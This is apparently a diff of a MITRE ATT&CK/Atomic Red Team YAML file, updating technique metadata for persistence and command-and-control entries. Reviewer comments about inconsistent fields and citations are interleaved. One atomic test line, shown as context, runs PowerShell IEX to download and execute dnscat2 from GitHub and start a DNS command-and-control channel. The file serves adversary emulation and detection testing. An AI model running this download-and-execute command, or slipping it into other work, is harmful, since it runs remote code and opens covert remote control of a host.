- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
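Review bot: the `x_mitre_permissions_required` block (Administrator, SYSTEM, root) is removed from SQL Stored Procedures in this hunk, yet the same key is left in place on Network Device Authentication (`- Administrator`) and COR_PROFILER (`- User`, `- Administrator`) further down the patch, so the field is now present for some techniques and absent for others in one file. If the upstream object dropped it, say so in the commit message; otherwise apply the removal uniformly, since any tooling that filters on that key will silently skip this entry. The two NetSPI references are also re-fetched with new URLs and a September 12, 2024 retrieval date while the Microsoft and Kaspersky entries keep their 2019 dates, which is fine but worth a line in the message so the bump from `x_mitre_version: '1.0'` to `'1.1'` is explained.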
@@ -61152,7 +61584,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -61176,12 +61608,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
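Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from Network Device Authentication with nothing added in their place, whereas Netsh Helper DLL loses only `spec_version` and keeps `x_mitre_attack_spec_version: 2.1.0` as context. Unless the attack spec version is set elsewhere in this object, it now carries no ATT&CK spec version at all; the same two-line removal recurs for COR_PROFILER, Fast Flux DNS and Protocol Tunneling. Either carry `x_mitre_attack_spec_version` over for those objects or document that consumers must treat the key as optional.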
@@ -61265,11 +61695,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -61321,9 +61750,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -61450,7 +61878,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -61488,8 +61916,6 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
@@ -61625,7 +62051,7 @@ persistence:
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -61688,7 +62114,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -61746,7 +62171,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests:
- name: XOR Encoded data.
@@ -61783,92 +62207,91 @@ command-and-control:
name: powershell
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
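Review bot: the `Akamai DGA Mitigation` reference now points at a medium.com post under a personal account while its description still credits Akamai and keeps the February 18, 2019 retrieval date; check that this is the upstream citation rather than a followed redirect, and update the retrieved date if the URL was actually re-fetched. In the same hunk `x_mitre_permissions_required: - User` is dropped for Domain Generation Algorithms even though other techniques in this patch keep that key, so the field is no longer consistently present across the file.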
@@ -61934,7 +62357,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests:
- name: DNS Large Query Volume
@@ -62061,6 +62483,65 @@ command-and-control:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
name: powershell
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
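Review bot: in the new T1071.005 object, the description lines carrying `MQTT`, `XMPP`, `AMQP` and `STOMP` appear without a leading `+`, so the hunk's line count no longer matches its `+62483,65` header and the patch will not apply cleanly; the inline code markup around those protocol names looks to have been lost when the diff was pasted, so re-export the hunk from git rather than from a rendered view. Separately, `x_mitre_detection: ''` ships an empty string for a newly added technique; if upstream has no detection text yet, omitting the key is kinder to consumers than making them special-case the empty string. The first citation's author list, `Hammond, Charlotte. Villadsen, Ole. Metrick, Kat..`, also has a doubled period.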
@@ -62106,7 +62587,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -62138,7 +62618,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -62160,22 +62640,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -62197,7 +62675,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -62222,7 +62700,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests:
- name: Telnet C2
@@ -62344,7 +62821,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests:
- name: TeamViewer Files Detected Test on Windows
@@ -62798,11 +63274,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -62886,7 +63361,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -62917,7 +63391,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -62937,8 +63411,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -62960,8 +63434,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests:
- name: DNS over HTTPS Large Query Volume
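Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1572 together with `spec_version`, whereas the T1071 and T1219 hunks above keep `x_mitre_attack_spec_version: 3.2.0` and drop only `spec_version`. Verify that T1572 still carries an `x_mitre_attack_spec_version` elsewhere in its object after regeneration (the same double removal happens for T1090, T1568, T1568.003, T1104, T1205.001 and T1102.003 further down); if it does not, the techniques end up with an inconsistent field set.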
@@ -63175,7 +63647,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -63223,7 +63694,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -63277,7 +63747,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -63310,7 +63779,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
